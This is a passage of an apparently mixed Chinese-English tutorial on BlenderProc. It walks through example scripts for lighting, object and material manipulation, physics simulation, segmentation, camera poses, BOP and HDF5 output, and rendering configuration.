    center=[1, 2, 3],
    radius_min=4,
    radius_max=7,
    elevation_min=15,
    elevation_max=70
    ))
    light.set_energy(500)

    这段代码的含义是:

    首先,创建了一个名为 light 的 BlenderProc Light 类型变量。

    接着,通过调用 light.set_type(“POINT”) 函数,指定该光源为点光源类型,即在三维空间中的某一点产生均匀辐射的光源。

    然后,通过调用 bproc.sampler.shell(center=[1, 2, 3], radius_min=4, radius_max=7, elevation_min=15, elevation_max=70) 函数,生成一个位于包围点 [1, 2, 3] 的球壳内的随机三维坐标位置,并将其设置为光源的位置,以实现光源位置的随机性。具体而言,函数的参数如下:

    • center=[1, 2, 3]:球心位置为 [1, 2, 3]。
    • radius_min=4:球壳内径的最小值为 4。
    • radius_max=7:球壳外径的最大值为 7。
    • elevation_min=15:光源位置相对于球心高度的最小值为 15 度。
    • elevation_max=70:光源位置相对于球心高度的最大值为 70 度。

    最后,通过调用 light.set_energy(500) 函数,将光源的强度 energy 设置为 500 瓦特,以控制光照亮度。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    # render the whole pipeline
    data = bproc.renderer.render()

    # Collect states of all objects
    object_states = []
    for obj in objs:
    object_states.append({
    "name": obj.get_name(),
    "local2world": obj.get_local2world_mat()
    })
    # Add states (they are the same for all frames here)
    data["object_states"] = [object_states] * bproc.utility.num_frames()

    # Collect state of the one light
    light_state = {
    "name": light.get_name(),
    "local2world": light.get_local2world_mat(),
    "energy": light.get_energy()
    }
    # Add states (its the same for all frames here)
    data["light_states"] = [light_state] * bproc.utility.num_frames()

    # Collect state of the camera at all frames
    cam_states = []
    for frame in range(bproc.utility.num_frames()):
    cam_states.append({
    "cam2world": bproc.camera.get_camera_pose(frame),
    "cam_K": bproc.camera.get_intrinsics_as_K_matrix()
    })
    # Adds states to the data dict
    data["cam_states"] = cam_states

    这段代码的含义是:

    首先,通过调用 bproc.renderer.render() 函数,对当前的场景进行渲染,并将渲染结果存储在 data 变量中。

    接着,通过遍历 objs 列表中的每一个对象 obj,将 obj 的名称和本地坐标系到世界坐标系的变换矩阵信息添加到 object_states 列表中。

    然后,将 object_states 列表复制 num_frames 次,并将其作为数据字典 data 中键名为 “object_states” 的值,表示所有帧的物体状态相同。

    接下来,将 light 对象的名称、本地坐标系到世界坐标系的变换矩阵信息和能量值信息添加到 light_state 字典中,并将其复制 num_frames 次并添加到 data 中键名为 “light_states” 的值中,表示所有帧的光源状态相同。

    最后,通过循环遍历所有帧的索引 frame,将每一帧相机的相机坐标系到世界坐标系的变换矩阵 cam2world 和相机的内参矩阵 K 添加到 cam_states 列表中,并将其作为数据字典 data 中键名为 “cam_states” 的值,表示所有帧的相机状态。

    Object selection and manipulation

    Usage

    blenderproc run examples/basics/entity_manipulation/main.py examples/resources/scene.obj examples/basics/entity_manipulation/output

    Visualization

    blenderproc vis hdf5 examples/basics/entity_manipulation/output/0.hdf5

    png

    Code

    # load the objects into the scene
    objs = bproc.loader.load_obj(args.scene)

    # Find object with name Suzanne
    suzanne = bproc.filter.one_by_attr(objs, "name", "Suzanne")
    # Set its location and rotation
    suzanne.set_location(np.random.uniform([0, 1, 2], [1, 2, 3]))
    suzanne.set_rotation_euler([1, 1, 0])

    The point of this example is BlenderProc's filtering, plus setting an object's location and rotation.

    In the filter call the condition is "name": 'Suzanne', meaning we want to select all objects satisfying obj.name == 'Suzanne'. Here exactly one object matches. To select several elements at once, use bproc.filter.by_attr() instead, which returns all matching objects (see the sketch below).

    Note: any given string attribute value can be treated as a regular expression by passing regex=True to the one_by_attr / by_attr call. The condition "name": 'Cylinder.*' would therefore select all three cylinders in the scene.

    For all possible attribute names, consult the official Blender documentation: https://docs.blender.org/api/current/bpy.types.Object.html.
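    A minimal sketch of selecting several objects at once with a regex, assuming the scene actually contains multiple objects named Cylinder, Cylinder.001, etc.:

    # Select every object whose name matches the regex "Cylinder.*"
    cylinders = bproc.filter.by_attr(objs, "name", "Cylinder.*", regex=True)
    # by_attr returns a list, so e.g. all matches can be moved at once
    for cyl in cylinders:
        cyl.set_location(cyl.get_location() + np.array([0, 0, 1]))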

    Material selection and manipulation

    Usage

    blenderproc run examples/basics/material_manipulation/main.py examples/basics/material_manipulation/scene.obj images examples/basics/material_manipulation/output
    • examples/basics/material_manipulation/main.py: path to the python file.
    • examples/basics/material_manipulation/scene.obj: path to the object file with the basic scene.
    • images: path to a folder with .jpg textures to be used in the sampling process.
    • examples/basics/material_manipulation/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/material_manipulation/output/0.hdf5

    png

    # Find all materials
    materials = bproc.material.collect_all()

    # Find the material of the ground object
    ground_material = bproc.filter.one_by_attr(materials, "name", "Material.001")
    # Set its displacement based on its base color texture
    ground_material.set_displacement_from_principled_shader_value("Base Color", multiply_factor=1.5)

    This code:

    1. Collects all materials with bproc.material.collect_all().
    2. Looks up one material by attribute with bproc.filter.one_by_attr(); here the condition "name": "Material.001" finds the material of the ground object.
    3. Calls ground_material.set_displacement_from_principled_shader_value() to drive the material's displacement from its base color texture, with multiply_factor=1.5 to strengthen the displacement.

    The goal is to modify the attributes of a specific material for a more interesting render.

    # Imports assumed by this excerpt of the example script
    from pathlib import Path
    import random
    import bpy

    # Collect all jpg images in the specified directory
    images = list(Path(args.image_dir).absolute().rglob("material_manipulation_sample_texture*.jpg"))
    for mat in materials:
        # Load one random image
        image = bpy.data.images.load(filepath=str(random.choice(images)))
        # Set it as base color of the current material
        mat.set_principled_shader_value("Base Color", image)

    This code:

    1. Builds the absolute path of the given directory (args.image_dir) with pathlib's Path() and finds, via rglob(), all files below it matching "material_manipulation_sample_texture*.jpg".

    png

    2. Iterates over all materials and assigns each a randomly chosen texture: random.choice() picks one of the collected images, and mat.set_principled_shader_value() sets it as the current material's base color.

    The goal is to give all materials in the scene varied textures, improving the realism of the render.

    Physics positioning

    Usage

    blenderproc run examples/basics/physics_positioning/main.py examples/basics/physics_positioning/active.obj examples/basics/physics_positioning/passive.obj examples/basics/physics_positioning/output
    • examples/basics/physics_positioning/main.py: path to the python file.
    • examples/basics/physics_positioning/active.obj: path to the object file with active objects, i.e. objects which we want to participate in the physics simulation.
    • examples/basics/physics_positioning/passive.obj: path to the object file with passive objects, i.e. objects which should not move, e.g. a plane.
    • examples/basics/physics_positioning/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/physics_positioning/output/0.hdf5

    png

    Code

    # Define a function that samples the pose of a given sphere
    def sample_pose(obj: bproc.types.MeshObject):
        obj.set_location(np.random.uniform([-5, -5, 8], [5, 5, 12]))
        obj.set_rotation_euler(bproc.sampler.uniformSO3())

    # Sample the poses of all spheres above the ground without any collisions in-between
    bproc.object.sample_poses(
        spheres,
        sample_pose_func=sample_pose
    )

    First we define a function that assigns a new pose to a given object. bproc.object.sample_poses then calls this function on each object and checks for collisions with the other objects, repeating the process until all objects are placed without collisions.

    In detail:

    1. sample_pose() takes a bproc.types.MeshObject and randomizes its pose: obj.set_location() samples the location uniformly from the box [-5, -5, 8] to [5, 5, 12], and obj.set_rotation_euler() assigns a rotation drawn uniformly from SO(3) via bproc.sampler.uniformSO3().
    2. bproc.object.sample_poses() applies this to all spheres above the ground while ensuring no two spheres collide. spheres is the list of objects to sample, and sample_pose_func is the sampling function defined above.

    The goal is to scatter the objects randomly for a more realistic render.

    # Make all spheres actively participate in the simulation:
    # active=True marks a sphere as an active body on which forces and collisions act.
    for obj in spheres:
        obj.enable_rigidbody(active=True)
    # The ground should only act as an obstacle and is therefore marked passive.
    # To let the spheres fall into the valleys of the ground, make the collision shape MESH instead of CONVEX_HULL.
    ground.enable_rigidbody(active=False, collision_shape="MESH")

    # Run the simulation and fix the poses of the spheres at the end.
    # min_simulation_time and max_simulation_time bound the simulated time in seconds, and
    # check_object_interval is how often (in seconds) the simulation checks whether all objects
    # have come to rest. Here the simulation runs between 4 s and 20 s, checking once per second.
    # (Note: this has no effect on objects whose rigid body component was not enabled.)
    bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1)

    This code:

    1. Makes all spheres active by enabling their rigid body component. The ground gets active=False, meaning it stays passive in the scene but still interacts with the active objects. The ground also uses the MESH collision shape instead of the default CONVEX_HULL. Note that MESH collision shapes can cause performance problems and glitches in more complex use cases; if that happens, try a convex decomposition (physics_convex_decomposition) instead.
    2. While the simulation runs, the function checks once per second whether any object is still moving, and stops once none is. The simulation runs for at least 4 and at most 20 seconds.
    3. At the end, the final poses of all spheres are fixed. This makes it easy to sample random resting positions of spheres on an uneven surface.

    The goal is to simulate physical interaction and motion between objects for more realistic renders.

    Semantic Segmentation

    Usage

    blenderproc run examples/basics/semantic_segmentation/main.py examples/resources/camera_positions examples/basics/semantic_segmentation/scene.blend examples/basics/semantic_segmentation/output
    • examples/basics/semantic_segmentation/main.py: path to the python file.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/basics/semantic_segmentation/scene.blend: path to the blend file with the basic scene.
    • examples/basics/semantic_segmentation/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/semantic_segmentation/output/1.hdf5

    png

    Code

    # load the objects into the scene
    objs = bproc.loader.load_blend(args.scene)

    This loads the .blend file, extracting only the mesh objects rather than everything stored in the file.

    Note that in the loaded .blend file, all objects already carry a custom property named "category_id". This can be set manually via:

    obj.set_cp("category_id", 0)

    # enable segmentation masks (per class and per instance)
    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

    This module can map any kind of object-related information to the rendered image or to a per-scene list of objects. For example, to map the custom property category_id onto the image, set map_by=["category_id"]; each pixel is then assigned the category_id of the object visible at that pixel. With "instance", each pixel instead gets an object id that is consistent across frames, which also means that not every id has to appear in every image.

    It can also be set to an attribute or custom property of the object class such as "name", which returns each object's name. Names cannot be stored in an image, so an additional dictionary mapping each instance number to a name is generated and attached to the final .hdf5 container. If any key cannot be stored in an image, an instance image must be generated as well, otherwise an error is raised.

    An attribute such as "location" can also be used; this reads each object's location and adds it to the dictionary. Note that if the background is visible, an error is raised, since the background has no location attribute. This can be avoided by providing a default value, e.g. default_values={"location": [0, 0, 0]}.
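    A minimal sketch combining these map_by options with default values; the exact attribute mix is illustrative, not taken from the example script:

    # Map category ids, instance ids and per-object locations;
    # pixels showing the background fall back to the provided defaults.
    bproc.renderer.enable_segmentation_output(
        map_by=["category_id", "instance", "location"],
        default_values={"category_id": 0, "location": [0, 0, 0]}
    )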

    Camera Object Pose Setting

    Usage

    blenderproc run examples/basics/camera_object_pose/main.py examples/basics/camera_object_pose/obj_000004.ply examples/basics/camera_object_pose/output
    • examples/basics/camera_object_pose/main.py: path to the python file.

    The following arguments fill the placeholders in the config file, e.g. <args:0>.

    • examples/basics/camera_object_pose/obj_000004.ply: path to the model file, here one of the basic objects of the hb dataset.
    ply
    format ascii 1.0
    element vertex 59070
    property float x
    property float y
    property float z
    property float nx
    property float ny
    property float nz
    property uchar red
    property uchar green
    property uchar blue
    property uchar alpha
    element face 118136
    property list uchar int vertex_indices
    end_header
    -74.8915252685546875 -19.9308242797851562 -39.8891220092773438 -0.881483376026153564 0.153793498873710632 -0.446469098329544067 201 194 89 255
    -74.283599853515625 -19.7608661651611328 -40.8353233337402344 -0.821542501449584961 0.139040097594261169 -0.552933812141418457 203 203 102 255
    -74.7142333984375 -19.3212966918945312 -39.9898719787597656 -0.876855313777923584 0.193883597850799561 -0.43992498517036438 201 196 92 255

    ...

    3 276 277 275
    3 279 278 249
    3 279 249 252

    ...

    This ply file contains the data of a triangle mesh; each data line describes either one vertex or one triangular face. The parts of the file:

    The first line identifies the file as PLY.

    The second line declares the data format as ASCII, version 1.0.

    The third line declares that the model contains 59070 vertices.

    Lines four through thirteen declare the per-vertex properties: the x, y, z coordinates, the normal nx, ny, nz, and the color red, green, blue, alpha.

    The next line declares that the model contains 118136 triangular faces, and the line after it defines the face property list: how many vertices each face has, followed by their vertex indices.

    end_header separates the header from the data section.

    Each following line describes one vertex, listing x, y, z, then nx, ny, nz, then red, green, blue, alpha.

    After the last vertex, each line describes one triangle in the form "3 a b c", meaning the face consists of the three vertices a, b, c, given as indices into the vertex list.

    In short, this PLY file describes a triangle mesh with all required vertex and face data and can be read and displayed by 3D modeling software or game engines (a minimal header-parsing sketch follows after this list).

    • examples/basics/camera_object_pose/output: path to the output directory.

    png

    Output in BOP dataset format
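    As an aside, the ASCII header above can be parsed with a few lines of plain Python; this sketch is not part of the BlenderProc example, and read_ply_header is just a hypothetical helper name:

    def read_ply_header(path):
        """Parse an ASCII PLY header, returning {element_name: count}."""
        counts = {}
        with open(path, "r") as f:
            assert f.readline().strip() == "ply"
            for line in f:
                tokens = line.strip().split()
                if tokens[0] == "element":          # e.g. "element vertex 59070"
                    counts[tokens[1]] = int(tokens[2])
                elif tokens[0] == "end_header":     # header/data separator
                    break
        return counts

    # e.g. {'vertex': 59070, 'face': 118136} for the file above
    print(read_ply_header("examples/basics/camera_object_pose/obj_000004.ply"))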

    Code

    # Use vertex color for texturing
    for mat in obj.get_materials():
        mat.map_vertex_color()
    # Set pose of object via local-to-world transformation matrix
    obj.set_local2world_mat(
        [[0.331458, -0.9415833, 0.05963787, -0.04474526765165741],
         [-0.6064861, -0.2610635, -0.7510136, 0.08970402424862098],
         [0.7227108, 0.2127592, -0.6575879, 0.6823395750305427],
         [0, 0, 0, 1.0]]
    )
    # Scale 3D model from mm to m
    obj.set_scale([0.001, 0.001, 0.001])
    # Set category id which will be used in the BopWriter
    obj.set_cp("category_id", 1)
    • Convert all materials to vertex-color materials, directly using the vertex colors of each loaded .ply object instead of the original material files.
    • Set the object's pose via its local-to-world matrix, given in meters.
    • Scale the model uniformly from millimeters to meters. Note that if the model is already in meters, this step is unnecessary.
    • Add a new custom property "category_id" set to 1, which the segmentation renderer later uses.

    The purpose of this code is to preprocess the loaded model for the rest of the pipeline: vertex-color materials avoid texture lookups and simplify rendering; scaling to meters keeps scene dimensions and distances between objects consistent; and the custom property gives the later segmentation renderer the class information it needs to distinguish objects.

    # Set intrinsics via K matrix.
    # K holds the camera's focal lengths and principal point and describes its internal optics.
    # The call takes the K matrix plus the final image width and height.
    bproc.camera.set_intrinsics_from_K_matrix(
        [[537.4799, 0.0, 318.8965],
         [0.0, 536.1447, 238.3781],
         [0.0, 0.0, 1.0]], 640, 480
    )
    # Set camera pose via cam-to-world transformation matrix.
    # cam2world describes the camera frame relative to the world frame; in practice such a
    # matrix often comes from external sensors such as an IMU or GPS.
    cam2world = np.array([
        [1, 0, 0, 0],
        [0, 1, 0, 0],
        [0, 0, 1, 0],
        [0, 0, 0, 1]
    ])
    # Change coordinate frame of transformation matrix from OpenCV to Blender coordinates,
    # since the pose above is specified in OpenCV conventions.
    cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])
    bproc.camera.add_camera_pose(cam2world)

    The purpose of this code is to configure the camera's internal optics and its pose. With intrinsics and pose set, the camera's position and orientation in the scene are modeled precisely, which yields more faithful renders and more accurate downstream vision algorithms.

    • set_intrinsics_from_K_matrix sets the camera's K matrix.
    • The camera pose is defined by its world matrix, which here is simply the identity.
    • The source frame of the pose is changed to match Blender's (converting from OpenCV to Blender coordinates).
    • Finally, the new camera matrix is registered as a pose, ready for rendering.
    # render the whole pipeline
    data = bproc.renderer.render()

    # Write object poses, color and depth in bop format
    bproc.writer.write_bop(args.output_dir, [obj], data["depth"], data["colors"], m2mm=True, append_to_existing_output=True)

    BOP is a public benchmark for object pose estimation. Its datasets provide RGB and depth images with ground-truth object poses, plus a 3D model for every object, so that pose estimation methods can be evaluated against a standardized benchmark.

    • write_bop saves all poses and camera information in the BOP format.
    • m2mm converts poses to millimeters, consistent with the original BOP annotations; set it to False to keep meters.
    • append_to_existing_output means that if the same output folder is chosen, data is appended rather than overwritten.
    Resources

    Paper

    Over the past years, the demand for high-quality training images has risen sharply; in pose estimation and instance segmentation, manually annotating data is extremely labor-intensive. To avoid this, we present BlenderProc.


    Config

    As the general configuration format, YAML files are used. Each config file has three parts:

    1. The first part is the setup:
    "setup": {
        "blender_install_path": "/PATH",
        "blender_version": "blender-2.80",
        "pip": [
            "h5py",
            "imageio"
        ]
    }
    2. The second part, named global, describes settings shared by all modules:
    "global": {
        "all": {
            "output_dir": "<args:0>"
        }
    }
    3. The third part lists the modules; their order in the config determines the execution order. Each module has a name corresponding to its module folder and class name, and the pipeline dynamically loads that class. The class must derive from the module base class; its code is executed, and the settings given here are passed to it.
    "modules": [
        {
            "name": "main.Initializer"
        },
        {
            "name": "loader.ObjLoader",
            "config": {"path": "<args:1>"}
        }
    ]

    LOADER

    The loader modules load various 3D meshes into the scene, as well as all other objects such as lights and cameras.

    RENDERER

    The renderer has several options:

    • resolution_x, resolution_y: resolution of the rendered image

    • samples: number of samples used to render the scene; more samples reduce noise

    • render_depth: also render the depth of the current image

    • stereo: enable rendering of stereo image pairs

    Color renderer

    png

    • min_bounces, max_bounces: bound the number of bounces each ray may take; higher values give better quality but slower renders

    • glossy_bounces: the maximum number of glossy reflection bounces; it must be greater than zero for glossy effects to be visible

    Depth renderer

    png

    This renderer generates depth images based on Blender's internal depth estimation.

    Normal renderer

    png

    Many deep learning tasks improve considerably when surface normals are provided as input; depth estimation is one such example. The normals are normalized and encoded as XYZ values.

    Segmentation renderer

    png

    For segmentation, every object needs a category id. In the suncg loader these are already set correctly; for your own loader you must do it manually by adding the custom property category_id, containing the class number in your dataset, to all objects.

    Instance segmentation masks can also be created, where not only the indices are saved but also a dictionary mapping each index to class and instance number. Both are stored in the .hdf5 file, which keeps them easy to use.

    To switch between semantic and instance segmentation, use the following setting:

    • map_by: if set to class, semantic segmentation based on category_id is performed; if set to instance, instance segmentation is performed.

    SAMPLER

    BlenderProc ships several samplers, typically used for lights, cameras and objects.

    Two examples of using a sampler when generating a light or camera position:

    "location": {
        "name": "Uniform3dSampler",
        "parameters": {
            "min": [0, 0, 0],
            "max": [1, 1, 1]
        }
    }

    In addition, every sampler can be combined with proximity checks.

    "location": {
        "name": "SphereSampler",
        "parameters": {
            "center": [0, 0, 1],
            "radius": 4,
            "mode": "SURFACE"
        }
    }

    A camera pose can be sampled and then checked, e.g. that the position is at least one unit away from any object and that the average distance to the objects in view lies in a given range. These options can be combined logically in arbitrary ways, making it easy to construct exactly the conditions you need. In the example below, the camera must be at least one unit away from any object in its view, and the average distance must lie between 1 and 4 units; only then is the pose used.

    "proximity_checks": {
        "min": 1.0,
        "avg": {
            "min": 1.0,
            "max": 4.0
        }
    }

    GENERATION TIME

    Generation runs offline in batch: once the camera poses are sampled, only the requested renderers are invoked per scene, and at the end all files for each camera pose are merged into an .hdf5 file. For suncg scenes we can generate roughly 3,000 images per hour on one GPU; those scenes are fairly complex, so in most cases rendering should be even faster. Still, speed is not a major concern for us, since generation is usually not a repeated process: spending a weekend on it and ending up with 180,000 images is typically enough for most training tasks.

    Code

    Hello World

    Set up the environment:

    conda create -n blender python=3.10
    conda activate blender
    pip install blenderproc

    Use this environment in PyCharm and create a quickstart.py.

    The script below builds a simple scene with BlenderProc: it creates a monkey model, adds a point light, places the camera in front of the model, renders the scene and writes the result to an HDF5 file. In detail:

    First, importing blenderproc and numpy and calling bproc.init() initializes BlenderProc's renderer and other required components.

    bproc.object.create_primitive("MONKEY") then creates the monkey primitive and stores it in the variable obj.

    bproc.types.Light() creates a point light named light, placed at [2, -2, 0] with energy 300, so the monkey model in the scene is lit by it.

    bproc.math.build_transformation_mat() builds the camera pose matrix cam_pose from the location [0, -5, 0] and the rotation [np.pi / 2, 0, 0], i.e. the camera sits in front of the monkey and looks at its face.

    bproc.camera.add_camera_pose() then registers this pose, and the scene is ready to render.

    bproc.renderer.render() renders the scene and returns the result in data.

    Finally, bproc.writer.write_hdf5() writes the render to disk; the first argument is the output path and the second the data to write. Here the result ends up in output/0.hdf5.

    import blenderproc as bproc
    import numpy as np

    bproc.init()

    # Create a simple object:
    obj = bproc.object.create_primitive("MONKEY")

    # Create a point light next to it
    light = bproc.types.Light()
    light.set_location([2, -2, 0])
    light.set_energy(300)

    # Set the camera to be in front of the object
    cam_pose = bproc.math.build_transformation_mat([0, -5, 0], [np.pi / 2, 0, 0])
    bproc.camera.add_camera_pose(cam_pose)

    # Render the scene
    data = bproc.renderer.render()

    # Write the rendering into a hdf5 file
    bproc.writer.write_hdf5("output/", data)

    In a shell, run:

    blenderproc run quickstart.py

    and off it goes (the first run installs a bunch of packages).

    Selecting render devices...
    Device NVIDIA GeForce RTX 4060 Laptop GPU of type OPTIX found and used.
    Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
    Fra:0 Mem:8.80M (Peak 8.87M) | Time:00:00.74 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne
    Fra:0 Mem:8.85M (Peak 8.87M) | Time:00:00.74 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Initializing

    ...

    Fra:0 Mem:28.56M (Peak 48.98M) | Time:02:02.85 | Remaining:00:00.01 | Mem:0.33M, Peak:15.33M | Scene, ViewLayer | Sample 1008/1024
    Fra:0 Mem:38.57M (Peak 52.57M) | Time:02:02.86 | Mem:0.33M, Peak:15.33M | Scene, ViewLayer | Sample 1024/1024
    Saved: 'C:\XXX\rgb_0000.png'
    Time: 02:03.50 (Saving: 00:00.32)

    Merging data for frame 0 into output/0.hdf5

    Blender quit
    Cleaning temporary directory

    When the run finishes, the file output/0.hdf5 has been generated.

    jpg

    In a shell, run:

    blenderproc vis hdf5 output/0.hdf5

    to view the visualization:

    jpg

    In a shell, run:

    blenderproc debug quickstart.py

    to open Blender's GUI:

    jpg

    Click Run BlenderProc and off it goes!

    jpg

    Tutorials

    Loading and manipulating objects

    Download

    If you don't have any data yet, the blenderproc CLI offers download commands for many datasets and freely available assets:

    • blenderproc download blenderkit <output_dir>: downloads materials and models from BlenderKit.
    • blenderproc download cc_textures <output_dir>: downloads textures from cc0textures.com.
    • blenderproc download haven <output_dir>: downloads HDRIs, textures and models from polyhaven.com.
    • blenderproc download ikea <output_dir>: downloads the IKEA dataset. (Currently unavailable!)
    • blenderproc download pix3d <output_dir>: downloads the Pix3D dataset.
    • blenderproc download scenenet <output_dir>: downloads the SceneNet dataset.
    • blenderproc download matterport3d <output_dir>: downloads the Matterport3D dataset.

    Loading

    BlenderProc offers several ways to import 3D models. All loaders are accessible via bproc.loader.load_* methods, each of which returns a list of the loaded MeshObjects.

    objs = bproc.loader.load_obj("mymesh.obj")

    File-type-specific loaders:

    • bproc.loader.load_obj: loads .obj and .ply files.
    • bproc.loader.load_blend: loads from .blend files.

    Dataset-specific loaders:

    • bproc.loader.load_AMASS: loads objects from the AMASS dataset.
    • bproc.loader.load_bop_objs: loads the 3D models of any BOP dataset and allows replicating BOP scenes.
    • bproc.loader.load_bop_scene: loads any real BOP scene using the 3D models.
    • bproc.loader.load_bop_intrinsics: loads the intrinsics of the specified BOP dataset.
    • bproc.loader.load_front3d: loads 3D-FRONT scenes.
    • bproc.loader.load_ikea: loads objects from the IKEA dataset.
    • bproc.loader.load_pix3d: loads Pix3D objects.
    • bproc.loader.load_replica: loads scenes from the Replica dataset.
    • bproc.loader.load_scenenet: loads SceneNet scenes.
    • bproc.loader.load_shapenet: loads objects from the ShapeNet dataset.
    • bproc.loader.load_suncg: loads SUNCG scenes.
    • bproc.loader.load_matterport3d: loads Matterport3D scenes.

    Manipulating objects

    As noted above, the loaders return MeshObjects, each of which can be manipulated in various ways:

    Changing poses

    An object's location can be changed via:

    obj.set_location([2, 0, 1])

    Its rotation can be set via Euler angles:

    obj.set_rotation_euler([np.pi, 0, 0])

    Or the full pose can be set via a 4x4 local-to-world transformation matrix:

    obj.set_local2world_mat(tmat)

    Or a 4x4 transformation matrix can be applied on top of the current pose:

    obj.apply_T(tmat)

    Custom properties

    To attach user-specific data to an object, use custom properties: in key-value fashion, you can assign any desired value to a given object.

    Set a custom property like this:

    obj.set_cp("my_prop", 42)

    And retrieve one like this:

    obj.get_cp("my_prop")

    Configuring the camera

    Intrinsics

    K matrix

    The easiest way is to set the intrinsics via a 3x3 K matrix.

    The snippet below builds the intrinsics matrix K as a numpy array and passes it to bproc.camera.set_intrinsics_from_K_matrix() to configure the camera.

    K is a 3x3 matrix holding the focal lengths fx and fy, the principal point coordinates cx and cy, and a fixed 1; these parameters determine how the observed scene projects into the image.

    bproc.camera.set_intrinsics_from_K_matrix() takes K together with the image width and height and uses them to compute the camera intrinsics, ensuring the scene is projected correctly when rendered.

    K = np.array([
        [fx, 0, cx],
        [0, fy, cy],
        [0, 0, 1]
    ])
    bproc.camera.set_intrinsics_from_K_matrix(K, image_width, image_height)

    Setting the focal length directly:

    bproc.camera.set_intrinsics_from_blender_params(lens=focal_length, lens_unit="MILLIMETERS")

    Setting the field of view directly:

    bproc.camera.set_intrinsics_from_blender_params(lens=field_of_view, lens_unit="FOV")

    Extrinsics

    A new camera pose is added by specifying a 4x4 camera-to-world transformation matrix:

    bproc.camera.add_camera_pose(tmat)  # tmat is a 4x4 numpy array

    Blender uses the OpenGL coordinate frame, so camera poses specified in OpenCV coordinates must be converted first:

    # OpenCV -> OpenGL
    cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])

    Rendering the scene

    Each renderer renders every frame in the configured interval [frame_start, frame_end - 1] and then returns a dict containing the rendered images grouped by type, e.g.:

    {
        "colors": [<np.uint8: [512, 512, 3]>, <np.uint8: [512, 512, 3]>],
        "normals": [<np.float32: [512, 512]>, <np.float32: [512, 512]>],
        "distance": [<np.float32: [512, 512]>, <np.float32: [512, 512]>]
    }

    Here the scene was rendered from the views of two camera poses, with normal and distance output activated.

    RGB renderer

    The RGB renderer is the main renderer and can be configured via the various API methods listed in the documentation.

    data = bproc.renderer.render()

    Depth, distance and normals

    With little extra overhead, the RGB renderer can also output depth/distance and normal images. These additional outputs are activated via:

    bproc.renderer.enable_distance_output()
    bproc.renderer.enable_depth_output()
    bproc.renderer.enable_normals_output()

    Samples & Denoiser

    Since Blender uses a ray tracer, the number of rays determines both the computational cost and the amount of noise in the rendered image: the more rays are computed, the longer the render takes, but the more accurate and less noisy the image becomes. The noise level can be controlled via bproc.renderer.set_noise_threshold(noise_threshold), meaning for each pixel only as many rays are used as needed to get below the noise threshold. noise_threshold is a float between 0 and 1 (e.g. 0.1); higher values allow more noise per pixel, while lower values give less noise but take longer to compute. You can cap the number of samples per pixel with bproc.renderer.set_max_amount_of_samples(max_amount_of_samples). For more on how Blender's renderer works, see the Blender documentation.

    Unfortunately, the noise level required for smooth results is very low, so rendering can take quite a while. To reduce the number of samples needed per pixel, Blender offers denoisers that reduce the noise in the resulting image. They are set via bproc.renderer.set_denoiser:

    • bproc.renderer.set_denoiser("INTEL"): activates Intel's Open Image Denoise.
    • bproc.renderer.set_denoiser(None): deactivates all denoisers.

    "INTEL" is used by default.
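    A minimal sketch of a quality/speed trade-off, putting the calls from this section together (the concrete values are just illustrative):

    # Stop sampling a pixel once its estimated noise falls below the threshold
    bproc.renderer.set_noise_threshold(0.05)
    # Never spend more than 512 samples on a pixel, whatever the threshold says
    bproc.renderer.set_max_amount_of_samples(512)
    # Let Intel's Open Image Denoise clean up the remaining noise
    bproc.renderer.set_denoiser("INTEL")
    data = bproc.renderer.render()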

    Segmentation renderer

    In a segmentation image, every pixel belonging to the same object is set to the same object-related number. Which number is used for a given object is determined by the map_by parameter:

    • "instance": every object is assigned a unique id (consistent across all frames), so the resulting images can be used for instance segmentation.
    • "class": uses each object's custom property category_id, which typically yields semantic segmentation images.
    • In addition, any other attribute/custom property can be used. If the attribute is not numeric, an instance segmentation image is returned together with a mapping from instance ids to the desired non-numeric attribute.

    When multiple map_by values are given, multiple segmentation maps are returned, or, if the corresponding attribute is non-numeric, an additional mapping is returned in instance_attribute_maps.

    For example:

    data = bproc.renderer.render_segmap(map_by=["instance", "class", "name"])

    The returned data will contain (assuming two registered frames/camera poses):

    {
        "instance_segmaps": [<np.array, [512, 512]>, <np.array, [512, 512]>],
        "class_segmaps": [<np.array, [512, 512]>, <np.array, [512, 512]>],
        "instance_attribute_maps": [
            [{"idx": 0, "name": "<object_name_0>"}, {"idx": 1, "name": "<object_name_1>"}, ...],
            [{"idx": 0, "name": "<object_name_0>"}, {"idx": 1, "name": "<object_name_1>"}, ...]
        ],
    }

    For names the mapping stays the same across frames, but some attributes may vary per frame, which is why instance_attribute_maps is also given per frame.

    Optical flow renderer

    Rendering the (forward/backward) optical flow between consecutive frames is done via:

    data = bproc.renderer.render_optical_flow()

    Here each pixel describes the change from the current frame to the next one (forward) or to the previous one (backward).

    Writing the results to file

    HDF5 Writer

    Using bproc.writer.write_hdf5, all given data belonging to the same frame is packed into one .hdf5 file. The advantage is that all data is compressed and data from different frames cannot get mixed up.

    To visualize a given hdf5 file, use the BlenderProc CLI:

    blenderproc vis hdf5 <path_to_file>

    To read the .hdf5 files in your data-processing code, use the h5py python package:

    import numpy as np
    import h5py
    with h5py.File("myfile.hdf5") as f:
        colors = np.array(f["colors"])

    To read json strings saved in the hdf5 file (e.g. object poses), you can use the following snippet:

    import json
    text = np.array(f["object_states"]).tobytes()
    obj_states = json.loads(text)

    Coco Writer

    Via bproc.writer.write_coco_annotations, rendered instance segmentations are written in COCO format. Read more about this format specification here.

    To visualize frames written in COCO format, use the BlenderProc CLI:

    blenderproc vis coco <path_to_file>

    BOP Writer

    Using bproc.writer.write_bop, depth and RGB images together with camera intrinsics and extrinsics are stored in BOP format. Read more about the BOP format specification here.

    How key frames work

